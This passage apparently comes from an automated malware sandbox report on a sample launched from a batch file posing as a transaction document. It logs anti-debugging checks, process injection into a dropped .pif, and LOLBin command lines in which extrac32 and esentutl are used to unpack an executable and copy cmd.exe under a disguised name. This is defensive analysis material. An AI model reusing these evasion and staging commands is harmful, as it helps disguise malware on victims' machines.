                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598222
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598068
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597946
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597844
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597719
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597610
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597485
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597360
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597235
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597110
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596981
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596875
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596767
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596640
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596528
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596416
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596304
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596188
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596050
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595938
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595810
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595698
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595585
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595249
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595123
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594911
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594789
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594677
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594564
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594439
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594313
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594177
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 593997
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 593860
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 593658
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 593506
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 593369
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 593196
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 593011
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 592620
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 592105
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 591918
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 591659
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 922337203685477
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 600000
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599891
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599781
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599672
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599562
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599453
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599344
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599234
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599124
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599007
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598891
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598780
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598422
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598297
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598172
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598062
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597953
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597844
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597719
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597609
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597500
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597391
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597281
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597172
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597062
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596953
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596844
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596734
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596625
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596515
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596406
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596297
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596187
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596078
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595932
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595813
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595700
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595579
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595466
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595344
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595234
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595125
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595016
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594906
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594797
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594687
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594578
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594469
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594344
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594234
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594125
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 922337203685477
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 600000
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599889
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599781
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599671
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599562
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599453
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599343
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599234
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599125
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599015
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598906
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598796
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598686
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598578
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598461
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598310
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598185
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598078
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597968
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597859
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597750
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597640
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597531
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597421
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597312
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597203
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597093
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596981
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596875
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596765
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596656
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596546
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596437
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596328
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596218
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596109
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595999
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595890
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595781
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595671
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595562
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595453
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595343
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595234
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595125
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595015
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594891
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594765
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594656
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594546
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594437
                  Source: Cllyjbrx.PIF, 00000010.00000002.1997779443.0000000000887000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW7
                  Source: x.exe, 00000003.00000002.1721962152.000000000085E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000002.1721962152.0000000000874000.00000004.00000020.00020000.00000000.sdmp, Cllyjbrx.PIF, 0000000A.00000002.1827777323.000000000064E000.00000004.00000020.00020000.00000000.sdmp, Cllyjbrx.PIF, 00000010.00000002.1997779443.0000000000848000.00000004.00000020.00020000.00000000.sdmp, Cllyjbrx.PIF, 00000010.00000002.1997779443.00000000008A1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                  Source: Cllyjbrx.PIF, 0000000A.00000002.1827777323.000000000061C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`
                  Source: xrbjyllC.pif, 00000009.00000003.1838900521.000000002C2A7000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1887148378.000000002C2A8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: xrbjyllC.pif, 00000011.00000003.2131319058.0000000025AB9000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2937690735.0000000025AB0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllc
                  Source: xrbjyllC.pif, 0000000B.00000003.1970886725.000000002A373000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000003.1970981133.000000002A383000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2040276262.000000002A370000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllww
                  Source: C:\Users\user\AppData\Local\Temp\x.exe API call chain: ExitProcess graph end node graph_3-32672
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif API call chain: ExitProcess graph end node graph_9-59609
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIF API call chain: ExitProcess graph end node graph_10-27319
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif API call chain: ExitProcess graph end node graph_11-57580
                  Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe API call chain: ExitProcess graph end node
                  Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe API call chain: ExitProcess graph end node
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIF API call chain: ExitProcess graph end node
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Process information queried: ProcessInformation

                  Anti Debugging

                  Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031DF744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,3_2_031DF744
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Process queried: DebugPort
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIF Process queried: DebugPort
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIF Process queried: DebugPort
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Code function: 9_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_0040CE09
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Code function: 9_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear,9_2_004019F0
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031D894C LoadLibraryW,GetProcAddress,FreeLibrary,3_2_031D894C
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Code function: 9_2_0040ADB0 GetProcessHeap,HeapFree,9_2_0040ADB0
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Process token adjusted: Debug
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Code function: 9_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_0040CE09
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Code function: 9_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_0040E61C
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Code function: 9_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00416F6A
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Code function: 9_2_004123F1 SetUnhandledExceptionFilter,9_2_004123F1
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Code function: 9_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_1_0040CE09
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Code function: 9_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_1_0040E61C
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Code function: 9_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_1_00416F6A
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Code function: 9_1_004123F1 SetUnhandledExceptionFilter,9_1_004123F1
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Code function: 11_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_0040CE09
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Code function: 11_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_0040E61C
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Code function: 11_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00416F6A
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Code function: 11_2_004123F1 SetUnhandledExceptionFilter,11_2_004123F1
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Code function: 11_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_1_0040CE09
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Code function: 11_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_1_0040E61C
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Code function: 11_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_1_00416F6A
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Code function: 11_1_004123F1 SetUnhandledExceptionFilter,11_1_004123F1
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Memory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: C:\Users\Public\Libraries\xrbjyllC.pif base: 400000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFMemory allocated: C:\Users\Public\Libraries\xrbjyllC.pif base: 400000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFMemory allocated: C:\Users\Public\Libraries\xrbjyllC.pif base: 400000 protect: page execute and read and write
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection unmapped: C:\Users\Public\Libraries\xrbjyllC.pif base address: 400000Jump to behavior
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFSection unmapped: C:\Users\Public\Libraries\xrbjyllC.pif base address: 400000Jump to behavior
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFSection unmapped: C:\Users\Public\Libraries\xrbjyllC.pif base address: 400000
                  Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Users\Public\Libraries\xrbjyllC.pif base: 3AF008Jump to behavior
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFMemory written: C:\Users\Public\Libraries\xrbjyllC.pif base: 382008Jump to behavior
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFMemory written: C:\Users\Public\Libraries\xrbjyllC.pif base: 283008
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\z1Transaction_ID_REF2418_cmd.bat" "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\Public\Libraries\xrbjyllC.pif C:\Users\Public\Libraries\xrbjyllC.pifJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /oJump to behavior
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFProcess created: C:\Users\Public\Libraries\xrbjyllC.pif C:\Users\Public\Libraries\xrbjyllC.pifJump to behavior
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFProcess created: C:\Users\Public\Libraries\xrbjyllC.pif C:\Users\Public\Libraries\xrbjyllC.pif
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,3_2_031C5ACC
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: GetLocaleInfoA,3_2_031CA7C4
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,3_2_031C5BD8
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: GetLocaleInfoA,3_2_031CA810
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Code function: GetLocaleInfoA,9_2_00417A20
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Code function: GetLocaleInfoA,9_1_00417A20
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,10_2_031A5ACC
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF | Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,10_2_031A5BD7
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF | Code function: GetLocaleInfoA,10_2_031AA810
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Code function: GetLocaleInfoA,11_2_00417A20
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Code function: GetLocaleInfoA,11_1_00417A20
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,16_2_03195ACC
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF | Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,16_2_03195BD7
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF | Code function: GetLocaleInfoA,16_2_0319A810
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 3_2_031C920C GetLocalTime,3_2_031C920C
Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe | Code function: 13_2_0040BBD4 GetTimeZoneInformation,13_2_0040BBD4
